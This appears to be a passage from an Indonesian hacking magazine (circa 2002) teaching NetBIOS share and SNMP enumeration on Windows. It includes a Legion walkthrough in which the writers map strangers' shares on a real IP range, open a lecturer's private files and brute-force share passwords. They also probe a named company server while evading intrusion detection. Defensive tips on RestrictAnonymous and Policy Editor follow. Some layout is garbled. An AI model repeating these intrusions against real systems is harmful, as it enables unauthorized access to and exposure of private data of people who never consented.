SharesFinder. Kedua software ini bersama NetBIOS scan-
ning tool lain dapat diperoleh dalam CD NeoTek bulan ini.

Dari mana kita tahu bahwa ada komputer di suatu tempat
yang terhubung ke Internet dan menyediakan dukungan
NetBIOS seperti contoh di atas? Caranya dengan utilitas
nbtscan yang dibahas berikut ini atau dengan menggunakan
NetBIOS scanner seperti Legion atau SharesFinder (tetapi
kalau sudah menggunakan Legion yang memanfaatkan
GUI, baris perintah DOS seperti di atas mungkin sudah
tidak relevan lagi).

NetBIOS Name Table dengan nbtstat dan nbtscan
Built-in tool lain yang hebat pada Windows adalah nbtstat,
yang memanggil NetBIOS Name Table dari suatu sistem

remote. Pada contoh ini kita akan melihat NetBIOS name
pada komputer KARINA (IP Address 192.168.123.187)
pada LAN NeoTek serta komputer remote pada IP Address
203.125.1345.46

C:\>nbtstat -A 192.168.123.187

C:\>nbtstat -A 203.125.135.46

Terlihat bahwa nbtstat mengekstrak system name
(KARINA), domainnya (NEOTEK), dan user yang sedang
log-in (KARINA ISKANDARSJAH). Sedangkan pada
remote computer percobaan kita system namenya
PROXY_COMPAQ, system namenya CAZH, dan user
yang sedang log on PROXY_COMPAQ.

Kelemahan nbtstat adalah batasan untuk dapat memeriksa
satu IP saja setiap kali. Hal ini diatasi oleh Alla Bezroutchko
dengan menyediakan nbtscan yang dapat di-download di
http://www.inetcat.org/software/nbtscan.htm atau terdapat
dalam CD NeoTek bulan ini. Dengan nbtscan kita dapat
men-nbtstat dengan mudah suatu range IP dengan cepat.
Kita coba untuk range IP pada LAN NeoTek (192.168.123.x)
serta range IP eksternal yang sedang kita jadikan kelinci
percobaan (203.125.135.x):

C:\>nbtscan 192.168.123.0/24

C:\>nbtscan 203.125.135.0/24

Terlihat baik pada network NeoTek maupun range IP
Address eksternal apa nama komputernya (NetBIOS
Name), apakah bertindak sebagai server atau tidak, siapa
user yang sedang log on pada komputer yang
bersangkutan, dan MAC Address dari komputer tersebut.

Komputer yang bertindak sebagai server itulah yang perlu
kita eksplorasi lebih lanjut apa share resource-nya

NetBIOS Code Resource

<computer name>[00] Workstation Service

<domain name>[00] Domain Name

<computer name>[03] Messenger Service (untuk pesan-
pesan yang dikirim ke komputer 
ini)

<user name>[03] Messenger Service (untuk pesan-
pesan yang dikirim ke user ini)

<computer name>[20] Server Service

<domain name>[1D] Master Browser

<domain name>[1E] Browser Service Elections

<domain name>[1B] Domain Master Browser

Penjelasan NetBIOS Code



(gunakan net view). Kemudian apakah share itu dapat kita
akses dengan menggunakan perintah net use untuk
mapping share itu ke komputer kita.

Nah! Kini anda sudah menjadi hacker hanya dengan meng-
gunakan fasilitas yang sudah ada pada sistem operasi Win-
dows itu sendiri (sedikit dibantu dengan utilitas sederhana
nbtscan). Setelah memahami dasar-dasarnya, kini kita lihat
bagaimana enumerasi share NetBIOS itu dapat diotomatisasi.

Enumerasi Share dengan Legion, NAT,  SharesFinder
Legion v.1.2

Legion dapat dengan mudah mengenumerasi suatu range
IP Address. Kalau kita klik ganda pada share yang terdapat
pada window pane kiri, maka bila null-session dapat dilak-
sanakan, share itu akan langsung di-mapping ke sistem ki-
ta. Adapun bila share itu dilindungi password, Legion akan
menawarkan apakah akan mencoba menebak password itu
dengan Brute Force tool yang telah tersedia. Untuk menja-
lankan Brute Force tool, anda harus mempunya daftar kata
(dictionary) yang juga disediakan pada CD NeoTek.

Sekali remote share itu telah di-mapping, maka share itu
menjadi 'milik' anda. Anda dapat meng-copy file dari situ
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ke komputer anda, mengirimkan file ke share itu (mungkin
Trojan?), atau bahkan menghapus file yang ada di dalam-
nya. Namun hati-hati, mungkin saja share itu merupakan
drive yang justru mengandung jebakan seperti adanya
nimda worm yang didapatkan sewaktu redaksi NeoTek
'iseng' masuk ke dalamnya.

NetBIOS Auditing Tool (NAT)

NetBIOS Auditing Tool (NAT) merupakan Windows share
scanner yang juga popular. Dibuat berdasarkan kode karya
Andrew Tridgell dan dapat diperoleh dari www.hacking-
exposed.com atau dalam CD NeoTek bulan ini. NAT bukan
saja mendapatkan share, namun juga berusaha masuk
berdasarkan daftar user name dan password yang telah
ditetapkan. NAT tersedia untuk Windows NT maupun
Linux (tidak terdapat versi untuk Windows 95/98/ME).

SharesFinder

Terdapat pula SharesFinder, utility seperti Legion yang
tidak terlalu popular (terdapat pada CD NeoTek bulan ini).
Seperti juga Legion, apabila kita double click pada share
(window pane kanan) maka bila null session dapat dilaku-
kan, share itu langsung di-mapping ke komputer kita.

SMBScanner
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SMBScanner men-scan SMB share, baik berupa file mau-
pun printer pada Windows (NetBIOS share) maupun Linux
box yang menjalankan Samba (Samba share). SMBScanner
selain menampilkan juga printer, juga memberi tanda apa-
kah share itu dapat diakses atau tidak. Hasil scanning ter-
hadap IP range yang sama antara Legion dan SMBShare
menunjukkan perbedaan itu. SMBScanner juga mampu
melaksanakan mapping terhadap remote share ke kompu-
ter local selain juga fasilitas Brute Force.

Pengamanan Terhadap Null-Session dan NetBIOS
Enumaration
Pengamanan Windows NT/2000
Karena null-session memerlukan akses ke port TCP 139
(dan/atau UDP 445 pada Windows 2000), maka cara yang
paling tepat untuk mencegah masuknya intruder adalah
dengan memfilter TCP port 139 dan UDP port 445. Dapat
juga men-disable sama sekali SMB service pada host NT
tertentu dengan jalan meng-unbinding WINS client (TCP/
IP) lewat Network Control Panel. Pada Windows 2000 hal
ini dapat dilakukan dengan unbinding File and Print Sharing
for Microsoft Network dari adapternya pada aplet Network
and Dial Up Connection → Advanced → Advanced Settings.

Microsoft kini menyediakan fasilitas untuk mencegah null-
session tanpa harus secara radikal melakukan unbinding
SMB dari interface network, yang disebut Restrict Anonym-
ous (mengikuti nama Registry key-nya):

1. Buka regedit32, cari entri
HKLM\SYSTEM\CurrentControlSet\Control\LSA

2. Pilih Edit > Add value dan masukkan data berikut:
Value Name: RestrictAninymous
Data Type: REG_DWORD
Value: 1 (atau 2 untuk Win 2000)

3. Exit dari Registry Editor dan restart komputer yang
bersangkutan.

Value 1 di atas sebenarnya tidak memblokir koneksi anonymous,
melainkan hanya mencegah bocornya informasi yang biasanya
dapat diperoleh melalui null-session, khususnya enumerasi
utama yaitu usaha mendapatkan user account dan share.
Pada Windows 2000, implementasi pengamanan ini mudah
dilakukan karena adanya Security Policies yang dapat disetel
pada tingkat Organizational Unit (OU), tingkat situs, atau-
pun tingkat domain. Informasi lebih jauh tentang Restrict
Anonymous dapat diperoleh pada Article Q143474 pada
http://search.support.microsoft.com. Juga dapatkan artikel
tulisan Hobbit di http://www.avian.org mengenai hacking
NetBIOS yaitu 'CIFS: Common Insecurities Fail Scrutiny.'

Pengamanan Windows 95/98/ME

Pada Windows 95/98/ME
yang tidak memiliki fasi-
litas Restrict Anonym-
ous, jangan lupa mene-
tapkan password terha-
dap share. Karena pass-
word dapat ditebak de-
ngan menggunakan Brute
Force tool yang disedia-
kan pada Legion, maka
tetapkan password yang
tidak lazim seperti  me-
nambahkan karakter-
karakter yang tidak
lazim. Itupun masih bisa

ditebak dengan menyiapkan daftar password menggunakan
password generator yang digunakan sebagai teks input bagi
Brute Force tool.

Cara yang sederhana adalah membuat share anda tidak
terdeteksi oleh NetBIOS scanner. Caranya ternyata mudah
saja. Tambahkan tanda $ di belakang Share Name, maka
share itu tidak tampak dan tidak menghasilkan output pada
kebanyakan NetBIOS scanner.

Bahaya Lain terhadap NT/2000
Walaupun NetBIOS service sudah diamankan baik-baik,
sistem NT/2000 masih mungkin membocorkan informasi
yang serupa apabila server itu menjalankan Simple Net-
work Management protocol (SNMP) yang dapat diakses
dengan memberikan default community string yang
biasanya berupa teks 'public.'

Untuk mengenumerasi user pada sistem NT/2000 digu-
nakan snmputil yang terdapat pada NTRK dengan
perintah:

C:\>snmputil walk 203.125.135.46 public .1.3.6.1.4.1.77.1.2.25

Deretan angka di bagian akhir sintaks (.1.3.6.1.4.1.77.1.2.25)
disebut object identifier (OID), yang akan menampilkan
MIB subtree pada Microsoft enterprise Managemnet
Information Base (MIB), sebagai yang didefinisikan pada
protocol SNMP. MIB adalah name space hierarkis, yang
berarti kita dapat berjalan 'ke atas' tree (ke nomor yang
lebih umum dan mendapatkan lebih banyak lagi informa-
si), misalnya dengan mengetikkan angka yang lebih tidak
spesifik (misalnya .1.3.6.1.4.1.77).

Selain dengan mengetikkan teks dengan snmputil, terdapat
pula SNMP Browser yang menampilkan secara grafis
informasi di atas. Contoh SNMP browser adalah SolarWinds,
yang beberapa versinya tersedia juga di CD NeoTek.
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SideStep

Fasilitas SNMP browser juga terdapat pada SideStep suatu
vulnerability scanner yang menyediakan cara untuk
menghindari pengamatan dari Intrusion Detection System
(IDS). SideStep dijalankan lewat command line DOS
dengan switch -evade (menghindari pengawasan IDS) dan
switch -snmp untuk melihat apakah terdapat SNMP
vulnerability pada server ini.

C:\>sidestep 202.134.2.15 -evade -snmp

Mencoba memeriksa apakah ada kelemahan SNMP pada
server www.telkom.co.id dengan menghindari pengawasan
IDS (Intrusion Detection System). IDS dengan menggu-
nakan Snort akan dibahas di NeoTek Agustus 2002.
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Enumerasi NT/2000 Domain Controller

Untuk mengenal lebih dalam struk-
tur network pada NT, gunakan nltest.
exe suatu tool yang ada pada NT Re-
source Kit (NTRK). Nltest.exe akan
mengenali Primary Domain Control-
ler maupun Backup Domain Control-
ler (PDC dan BDC) dalam suatu domain.

Selanjutnya kita harus melaksanakan
null-session pada mesin NT itu. Sete-
lah null-session terlaksana pada do-
main yang terenumerasi, maka selan-
jutnya gunakan sintaks nltest
/server:<server_name> dan
/trusted_domain untuk mempe-
lajari domain NT ini lebih dalam.

Kita tidak akan membahas lebih jauh
tentang Domain Controller ini. In-
formasi selanjutnya dapat dilihat dari
situ support Microsoft di
http://support.microsoft.com/default.
aspx?scid=kb;EN-US;q158148

Enumerasi Share dengan DumpSec
(DumpAcl)

Salah satu tool terbaik untuk enume-
rasi share pada NT adalah DumpSec
(dulu DumpAcl), dapat diperoleh dari
situs Somarsoft (www.somarsoft.com)
atau dari CD NeoTek. DumpSec hanya
berjalan pada NT.

Enumerasi Share dengan net view dan
RK Tools

Dengan terlaksananya null-session,
pada NT kita juga dapat mengguna-
kan net view untuk meng-enumerasi
share pada suatu remote system. Pa-
da NTRK terdapat tiga share-enum-
eration tool yang bagus yaitu
rmtshare, srvcheck, dan srvinfo
(menggunakan switch -s). Rmtshare
menghasilkan output serupa dengan
net view. Srvcheck menampilkan
share dan authorized user-nya, ter-
masuk juga share yang disembunyi-

kan, namun srvcheck
membutuhkan akses
privilege ke remote
system untuk dapat
mengenumerasi user
dan hidden share.
Srvinfo -s menampil-
kan daftar share ber-
sama dengan banyak
informasi potensial
lain.

Windows NT/2000
Enumeration Tool Lain

Beberapa enumera-
tion tool yang dapat
anda coba di anta-
ranya epdump dari
Microsoft (http://
packetstorm. security.
com/NT/audit/
epdump.zip), getmac
dan netdom (dari
NTRK), netviewx karya Jesper
Lauritsen (http:// www
.ibt.ku.dk/jesper/ Nttools), winfo dari
Arne Vidstorm (http://
www.ntsecurity.nu), dan nbtdump dari
David Litchfield (http://
www.cerberus-infosec.co.uk/
toolsn.shtml).

Epdump melacak RPC endpoint map-
per dan menunjukkan service yang
terkait pada IP Address dan port
number-nya.

Dengan menggunakan null-session,
getmac menampilkan MAC Address
dan device name dari suatu network
interface card pada suatu remote
machine. Ini dapat menghasilkan in-
formasi tentang network yang ber-
manfaat bagi hacker.

Netdom lebih bermanfaat lagi, meng-
enumerasi informasi kunci tentang
NT domain, termasuk domain mem-
bership dan identitas dari berbagai 

Backup Domain Controller.

Netviewx juga merupakan tool untuk
menampilkan daftar simpul-simpul
pada domain serta service apa yang
dijalankan oleh setiap simpul (node)
tersebut. Netviewx sering digunakan
untuk memeriksa NT Remote Access
Service (RAS) untuk mendapatkan 

gambaran mengenai banyaknya dial-
in server yang terdapat pada network.

Winfo mengekstraksi user accounts,
shares, interdomain, server, dan
workstation trust accounts. Null-
session juga dapat diotomatisasi
dengan switch -n.

Nbtdump menciptakan null-session,
mengenumerasi share dan user
account, dan menyajikan laporannya
dalam format HTML yang rapih.

Enumerasi Lebih Lanjut Terhadap Windows NT
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Tool Networking TCP/IP Sederhana pada Windows 9x

ita mungkin tidak menya-
dari bahwa pada sistem ope-
rasi Windows 9x yang kita

miliki sudah terdapat beberapa tool
sederhana untuk networking berbasis
TCP/IP. Tentu saja yang lebih leng-
kap memang bila anda temukan di
Linux, karena TCP/IP memang
“bahasa ibu”-nya Linux. Beberapa
perintah yang disediakan Windows
adalah winipcfg, ipconfig, ping, arp,
tracert, dan netstat. Akan kita lihat
informasi apa yang bisa diperoleh
dari perintah-perintah itu.

Perintah-perintah itu bisa anda jalan-
kan pada jendela MS-DOS prompt
pada Windows, atau melalui menu
Start → Run. Tentu saja kegunaan
perintah akan lebih nampak bila kom-
puter anda terhubung ke Internet,
maupun terhubung ke PC lainnya
lewat jaringan LAN. Diasumsikan di
sini protokol TCP/IP sudah terinsta-
lasi pada Windows anda 

Winipcfg
Dengan perintah ini anda bisa meli-
hat konfigurasi perangkat jaringan
yang ada berikut alamat IP-nya
masing-masing. Kalau misalkan anda
sedang terhubung ke Internet, anda
bisa melihat alamat IP yang diberikan
oleh ISP pada dial-up adapter anda.
Seperti kita ketahui kalau anda ter-
hubung ke ISP dengan cara dial-up
maka alamat IP anda akan di-assign
oleh ISP secara dinamis (berbeda-
beda setiap kali anda connect). Bebe-
rapa ISP juga secara otomatis mem-
berikan alamat Server DNS dan
Gateway tanpa anda harus men-setnya.

Bila anda memiliki card LAN/ Ether-
net, anda juga bisa melihat alamat
fisik dari card jaringan anda. Sebenar-
nya setiap card Ethernet yang dipro-
duksi memiliki alamat fisik yang
unik. Alamat fisik tersebut dinyata-
kan dalam heksadesimal terdiri dari
enam byte, dimana tiga byte pertama
menyatakan kode pabrik pembuatnya.
Misalkan saja card Ethernet merk
Compex yang saya punya memiliki
alamat fisik: 00-80-48-E2-49-BA,
maka kode pembuatnya adalah 00-
80-48. Bila ada teman saya yang juga
memiliki card merk Compex, maka
tiga byte pertama dari alamat fisik
card bisa sama, tetapi tiga byte
terakhir berbeda. Artinya dijamin
tidak ada dua card Ethernet yang
memiliki alamat fisik yang sama
(seharusnya).

Ipconfig

Perintah ini hasilnya serupa dengan
Winipcfg, hanya keluarannya di sini
dalam mode teks. Untuk melihat in-
formasi konfigurasi yang lebih leng-
kap anda bisa menggunakan perintah:
Ipconfig /all. Kalau anda kesulitan
membaca hasilnya karena scroll yang
cepat, anda bisa meletakkan output-
nya ke suatu file. Misalkan anda ingin
hasil perintah diletakkan ke file ber-
nama output.txt maka perintah yang
anda gunakan:
C:\>ipconfig /all /batch output.txt.
File output.txt merupakan file teks
biasa yang bisa dibaca dengan pro-
gram editor teks seperti Notepad.

Ping
Perintah paling mendasar yang biasa
digunakan untuk mengamati konek-
tivitas/keterhubungan dan kinerja
jaringan. Ada beberapa kemungkinan
hasil dari perintah ping, misalkan saja
anda melakukan perintah:
C:\>ping yahoo.com

Bila DNS server dapat menemukan
server yahoo.com dan server yahoo.
com sedang aktif, maka akan diberikan
jawaban yang menginformasikan
alamat IP dari yahoo.com serta delay
(dalam satuan milisekon) yaitu wak-
tu yang dibutuhkan untuk memper-
oleh jawaban. Dari delay tersebut
anda dapat mengetahui kinerja jaringan.

Bila DNS server dapat menemukan
server yahoo.com, tetapi server
yahoo.com sedang tidak aktif (kapan
ya…?), atau koneksi lewat ISP anda
terlalu lambat (biasanya ini
penyebabnya) maka pesan yang
muncul biasanya adalah: Request
time out, artinya kira-kira sudah
terlalu lama untuk menunggu
jawaban.

Bila pesan yang muncul: Unknown
host, berarti DNS server anda tidak
bisa menemukan alamat IP server
yang dimaksud (coba sajalah lakukan
perintah semacam: ping embuh.
gakweruh.com), kemungkinan lain
komputer anda yang tidak menemu-
kan DNS servernya (perlu anda
setting dulu alamat DNS yang diacu
oleh komputer anda).

Anda juga bisa melakukan perintah
ping langsung dengan alamat IP-nya.
Misalkan saja anda memiliki jaringan
lokal dengan private address (untuk
sharing internet dengan teman kost
anda?) anda melakukan semacam :
ping 192.168.0.1

Tracert

Perintah ini bisa anda gunakan untuk
melacak route untuk sampai ke suatu
server. Seperti anda ketahui Internet
pada dasarnya terdiri dari banyak kom-
puter yang saling terhubung. Di sini
anda bisa melihat bagaimana perjalanan
"paket" anda untuk sampai ke server
yahoo.com misalnya dengan perintah

C:\>tracert yahoo.com.

Hasil yang diberikan akan menunjuk-
kan server-server mana saja yang di-
lewati oleh "paket" anda. Di sini dibatasi
maksimal sampai 30 simpul/hop.

Arp (address resolution protocol)
Bila sebelumnya dengan ipconfig kita
bisa mengetahui alamat fisik card kita,
maka arp memungkinkan kita menge-
tahui alamat fisik card komputer lain
yang terhubung dalam jaringan. Misal-
kan anda ingin mengetahui alamat
fisik dari card dengan IP  192.168.0.5
pada jaringan, maka perintahnya:

C:\>arp -a 192.168.0.5

Netstat
Perintah netstat memiliki beberapa
option yang penting:

netstat -e: akan menyajikan statis-
tik jaringan, yaitu banyaknya paket
yang dikirim dan diterima.

netstat -r: menunjukkan isi tabel
routing. Efeknya akan  lebih kelihatan
bila anda mencobanya saat terkoneksi
ke internet.

netstat -a: menginformasikan akti-
vitas port TCP/IP pada komputer anda.
Seperti kita ketahui setiap aplikasi
TCP/IP menggunakan nomor port
yang berbeda. Setiap port bisa diang-
gap sebagai sebuah jalur yang "men-
dengarkan" (listening) apakah ada
request/permintaan ke port tersebut.
Sebagai contoh nomor port default
untuk FTP=21, Telnet=23, Http=80.
Misalkan di komputer anda diinstall
aplikasi Personal Web Server (PWS),
maka bila PWS anda jalankan akan
didapati bahwa port nomor 80 dalam
keadaan aktif/listening. Perintah netstat
ini dapat pula kita manfaatkan untuk
memantau kemungkinan adanya trojan/
backdoor yang aktif di komputer kita
pada suatu port.

Semoga dengan mencoba perintah-
perintah sederhana di atas anda akan
memperoleh pemahaman yang lebih
baik mengenai jaringan baik LAN
maupun Internet, khususnya yang
berbasis TCP/IP.

K
Firrar Utdirartatmo
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6 CALON ‘MANGSA’ KITA
Buka MyComputer. Setelah di-map
sebagai drive lokal (pada contoh ini
drive G sampai K), maka kita dapat
memperlakukannya sebagai milik
kita sendiri. Kita dapat meng-copy,
men-delete, ataupun kegiatan
lainnya. Mengerikan bukan?

NeoTekno

MASUK LEBIH JAUH
Kita bisa mengeksplorasi isi dari sha-
re ini. Wah! Ada foto pribadi. Jangan
ketawa dulu. Tahukah anda bahwa
mungkin ada orang lain yang juga
sedang mengintip komputer anda?
Ingat dalam mengaktifkan share pa-
da Network Neighborhood jangan
lupa pakai password!

SIAPA SIH SI CEROBOH INI?
Dari dokumen yang ada kita bisa
menduga siapa pemilik komputer ini,
yang ternyata seorang dosen di NTU
(Nanyang Technological University) di
Singapore. Dosen dari School of
Computer Engineering lagi. Jangan-
kan kita, dosen komputer saja bisa
ceroboh ya?

USER YANG BAIK
Komputer 203.125.212.103 mem-
punyai dua share yang dinamakan
OFFICE dan MYDOCUMENTS.
Double click Folder MyDocuments
ini yang ternyata diproteksi oleh
password. Klik No untuk menjawab
pertanyaan apakah ingin menguji
kekuatan password ini.

MAPPING KE DRIVE LOKAL
Klik dua kali share dengan nama
SHAREDOCS. Legion langsung me-
map share itu menjadi drive lokal di
komputer kita. Dalam hal ini dijadi-
kan Drive G. Coba lagi share-share
yang lain. Apabila null-session ini
berhasil maka share itu langsung di-
map sebagai drive lokal.

4

10 11

5

Menunjukkan betapa berbahayanya file sharing pada Windows

FOLDER YANG DIPROTEKSI
Walaupun sudah berhati-hati dan
share-nya diproteksi dengan pass-
word, masih saja ada bahaya. Kita
kembali ke share yang diproteksi
dengan password tadi. Kali ini klik
Yes untuk menguji kekuatan pass-
word-nya.

12

LELEGGIIOON V2.N V2.11
GGAMAMPPANANG KG KOOK JK JALALAN-JAN-JALALANAN
KKE KE KOOMMPPUUTTEER OR ORRANANGG
File sharing pada Windows (fasilitas NetBIOS) banyak dimanfaatkan
oleh para pemilik home network. Sementara mudah digunakan dan
nyaman, ternyata fasilitas ini sangat rentan terhadap penyusupan.
Bagaimana tidak, kalau fasilitas Network Neighborhood ini benar-benar
dimanfaatkan oleh tetangga yang tidak diundang! 

ools untuk mengintip share
pada network ini amat mudah
penggunaannya. Enumation

tool yang untuk LAN ini dapat juga
untuk IP Address secara umum!

Lebih parah lagi bila share resource
itu tidak dilindungi password, maka
langsung dapat di-mapping sebagai
drive lokal sang intruder. Adanya
password juga bukan jaminan karena
Legion dilengkapi Brute Force tool,
yaitu alat bantu untuk menebak
password menggunakan daftar kata
dari kamus atau password generator.

Awas! Bila anda mencoba software
ini, lindungi dulu komputer anda
dengan antivirus.

T
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BRUTE FORCE TOOL
Legion mempunyai kelebihan di-
banding NetBIOS scanner lain, yaitu
adanya fasilitas untuk menebak
password (Brute Force tool). Tampil
jendela Force Share yang akan
menebak password pada share
\\203.125.212.103\MYDOCUMENTS

ADD WORD LIST
Sebelumnya diasumsikan anda telah
menginstalasi Word List yang juga
disediakan di CD NeoTek. Pada
Force Share klik Add dan jendela
Add Word List akan tampil. Browse
ke folder penyimpanannya. Klik
pada file-file teks ini dan setiap kali
klik Open. 

BUKA SALAH SATU FOLDER
Coba kita buka salah satu folder
mangsa kita ini. Pada contoh ini
kita buka folder OFFICE pada
komputer dengan IP Address
203.125.212.103 yang sudah di-
mapping sebagai drive H: di
komputer kita. Klik dua kali drive
itu. Ada dua folder di sana.

INVASION OF PRIVACY
Klik dua kali lagi folder personal
untuk melihat isinya. Anda tahu
bahwa tidakan ini sudah me-
rupakan pelanggaran hak pribadi
orang? Ibarat ada rumah orang yang
pintunya terbuka lebar. Masuk ke
dalamnya tetap merupakan pe-
langgaran. Masih mau terus?

7

13 14

8 AHA! ADA FILE EXCEL
Ada beberapa file Excel di sini. Masih
mau mengintip terus. OK kita terus-
kan. Klik dua kali file dengan nama
Contact. Nah, bocor deh data
pekerjaan ‘mangsa’ kita ini. Anda
bisa saja men-sabotase dengan
mengubah data yang ada atau bah-
kan menghapusnya. Jangan ah!

9

MENEBAK PASSWORD
Proses menebak password pun berjalan
secara otomatis. Bila kurang beruntung
dengan daftar kata ini cari lagi kamus-
kamus lain. Ada berbagai macam kamus
yang disediakan dalam CD NeoTek kali
ini untuk eksperimen anda menebak
password dengan Brute Force.

15

NODE AKTIF DENGAN SHARE-NYA
Ternyata dari 256 IP Address yang
di-scan NetBIOS-nya itu terdapat 4
host dengan 6 share. Ini adalah 4
komputer yang terhubung ke Inter-
net pada range IP Address yang
tadi serta mengaktifkan resource
sharing dengan windows network.

2
SCANIPADDRESS RANGE
Jalankan Legion v2.1 yang diinstal
dari CD NeoTek bulan ini. Pada con-
toh ini kita akan men-scan range IP
Address 203.125.212.0 sampai
203.125.212.255. Anda tentunya
dapat men-scan range apa saja.
Klik Start dan scanning dimulai.

1 SHARE PADA TIAP NODE
Klik tanda plus (+) di sebelah kiri
ikon komputer, maka share pada
komputer itu akan ditampilkan di
bawahnya. Kita akan mulai meme-
riksa para calon ‘mangsa’ kita.
Mana saja yang ceroboh sehingga
mudah dimasuki tanpa permisi.

3
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kibatnya dari kelemahan sistem operasi keluaran
Microsoft itu, maka siapa pun yang mengoperasikan
dapat mem-browse, menghapus data atau program,

melakukan dial-up ke ISP, dan menjalankan semua aplikasi
yang ada di dalam hard disk anda, termasuk mengubah set-
ting dan konfigurasi sistem yang sudah diatur sebelumnya.

Meskipun secara teknis sebenarnya kita dapat membuat user
profile untuk pemakai lain dan mengharuskan mereka me-
lakukan login terlebih dahulu berdasarkan identitas yang
sudah ditentukan pada profile masing-masing, hal itu ter-
nyata tetap tidak terlalu bermanfaat. Walau bagaimanapun
pemakai lain masih dapat melakukan apa saja pada semua
resource yang ada di dalam komputer kita. Oleh karena itu,
tidak mengherankan jika sistem operasi Microsoft Windows
sangat rentan terhadap kesalahan yang dilakukan oleh
orang lain, baik disengaja maupun tidak.

Untuk mengatasi persoalan tersebut di atas, atau dengan
kata lain untuk membatasi pengguna lain mengakses
sumber daya di komputer anda, anda dapat menggunakan
program Poledit (Policy Editor). Poledit adalah program
editor yang digunakan untuk menyunting konfigurasi/
setting registry yang tersimpan dalam file USER.DAT dan
SYSTEM.DAT. Program ini dapat anda temukan dalam
direktori sebagai berikut :

\Admin\Apptools\Poledit
(Pada CD installer MS Window 95)

\Tools\Reskit\Netadmin\Poledit
(Pada CD installer MS Windows 98)

Jika program tersebut tidak ada di dalam CD installer MS
Windows anda, maka anda dapat men-download-nya de-
ngan gratis dari beberapa situs di bawah ini:

http://support.microsoft.com
http://msdn.microsoft.com
http://lycos.co.uk/tricksy/poledit

Dengan Poledit anda dapat melakukan beberapa hal pada 5
properti Windows berikut:

Control Panel
Membatasi pemakai lain sehingga tidak mengakses komponen-
komponen yang ada di dalam Control Panel. Adapun
properti yang dapat anda kunci agar tidak dapat diakses
pengguna lain adalah:

Display (Restrict Display Control Panel)

[√] Disable Display Control Panel
Menonaktifkan fungsi klik kanan tombol mouse di
layar desktop.

[√] Hide Background page
Mencegah pemakai mengatur setting gambar latar
belakang desktop (Wallpaper).

[√] Hide Screen Saver page
Mencegah pemakai mengatur setting Screen Saver.

[√] Hide Appearance page
Mencegah pemakai mengatur Scheme, Item, dan Font.

[√] Hide Settings page
Mencegah pemakai mengatur setting resolusi dan
Screen area.

Network (Restrict Network Control Panel)

[√] Disable Network Control Panel
Mencegah pemakai mengakses menu properties
Network Neighborhood.

[√] Hide Identification page
Mencegah pemakai mengisi atau mengubah nilai field

PPolicy Editorolicy Editor
Sebagai PSebagai Pelindung Melindung MS WindoS Windowsws

Salah satu kelemahan Windows 95/97/98/2000/ME jika dioperasikan secara default adalah ketakmam-
puannya membatasi pengguna lain mengakses seluruh sumber daya yang ada di dalam hard disk. Eryanto

Sitorus memberi tip cara melindungi komputer anda dengan Policy Editor.

A

Properti pada jendela ‘Display Properties.’
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Computer name, Workgroup, dan Computer
Description.

[√] Hide Access Control page
Mencegah pemakai mengatur setting terhadap metode
yang digunakan untuk mengakses sumber daya
jaringan.

Password (Restrict Password Control Panel)

[√] Disable Passwords Control Panel
Mencegah pemakai mengakses komponen Password.

[√] Hide Change Passwords page
Mencegah pemakai mengubah setting password user
profile.

[√] Hide Remote Administration page
Mencegah pemakai mengakses fungsi administrasi
jarak jauh.

[√] Hide User Profiles page
Mencegah pemakai mengakses konfigurasi user profile.

Printer (Restrict Printer Settings)

[√] Hide General and Details pages
Menyembunyikan kotak tab General dan Details
properti Printer.

[√] Disable Deletion of Printers
Mencegah pemakai menghapus komponen printer
yang sudah diinstal.

[√] Disable Addition of Printers
Mencegah pemakai menambah/menginstal printer.

System (Restrict System Control Panel)

[√] Hide Device Manager page
Menyembunyikan kotak tab Device Manager pada

jendela System Properties.

[√] Hide Hardware Profiles page
Menyembunyikan kotak tab Hardware Profiles.

[√] Hide File System button
Menyembunyikan tombol File System yang terdapat
pada kotak tab Performance di bagian Advanced
settings.

[√] Hide Virtual Memory button
Menyembunyikan tombol Virtual Memory yang
terdapat pada kotak tab Performance di bagian
Advanced settings.

Desktop
Membatasi pemakai lain untuk tidak mengakses setting
properti Desktop. Adapun properti yang bisa anda kunci
adalah sebagai berikut:

[√] Wallpaper
Fungsi ini sama dengan Hide Background Page, yaitu
untuk mencegah pemakai mengatur setting gambar
latar belakang desktop (Wallpaper).

[√] Color Scheme
Mencegah pemakai mengatur konfigurasi Scheme pada
tab Appearance jendela Display.

Network
Membatasi pemakai untuk tidak mengakses fasilitas
sharing yang terdapat pada komponen Network. Adapun
fasilitas yang bisa Anda kunci adalah sebagai berikut :

Sharing
[√] Disable file sharing controls

Menonaktifkan menu sharing
untuk bagi pakai file.

[√] Disable print sharing controls
Menyembunyikan print
sharing dari Network
Neighborhood.

Shell
Membatasi pemakai untuk tidak
mengakses program dalam modus
shell Windows berserta fasilitas

Properti pada jendela ‘Network.’

Properti pada jendela ’System Properties.’

Komponen-komponen Control Panel yang dapat dikunci oleh Poledit.

Properti pada jendela ’Password Properties.’

Properti pada jendela ‘Printer.’

Menu file ‘Sharing.’
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lainnya. Adapun program dan fasilitas yang dapat Anda
kunci adalah sebagai berikut:

Custom Folders
(Bagian ini tidak terlalu penting, Anda dapat
mengabaikannya )

Restrictions

[√] Remove “Run” command
Menghilangkan menu Run dari menu Start.

[√] Remove folders from "Settings" on Start Menu
Menghilangkan folder atau direktori menu Settings
dari menu Start.

[√] Remove Taskbar from “Settings” on Start Menu
Menghilangkan menu Taskbar dan Start Menu dari
menu Start → Settings.

[√] Remove “Find” command
Menghilangkan menu Find dari menu Start.

[√] Hide Drives in “My Computer”
Menyembunyikan tampilan ikon drive hard disk,

floppy, dan CD-ROM dari jendela My Computer.

[√] Hide Network Neighborhood
Menyembunyikan ikon Network Neighborhood dari
layar desktop.

[√] No “Entire Network” in Network Neighborhood
Mengosongkan ikon Entire Network dan jendela
Network Neighborhood.

[√] No workgroup contents in Network Neighborhood
Mengosongkan icon Workgroup dari jendela Network
Neighborhood.

[√] Hide all items on Desktop
Menyembunyikan semua ikon semua program aplikasi
dari layar desktop.

[√] Disable Shutdown command
Menonaktifkan menu Shutdown dari menu Start.

[√] Don't save settings at exit
Apa yang sudah di-setting oleh pemakai tidak akan
disimpan dan akan diabaikan oleh sistem.

System
Membatasi pemakai untuk tidak mengakses beberapa
program, antara lain:

Restrictions
[√] Disable Registry editing tools

Menonaktifkan program editor registry (REGEDIT.EXE).

[√] Disable MS-DOS prompt 
Menonaktifkan shell MS-DOS (COMMAND.COM).

[√] Disable single-mode MS-DOS applications 
Menonaktifkan semua program yang berjalan pada
modus DOS.

Jendela ‘Browse for Printer.’ Di sini pun anda dapat membuat perlindungan.

Local Security Policy

Selain pengamanan dengan Policy
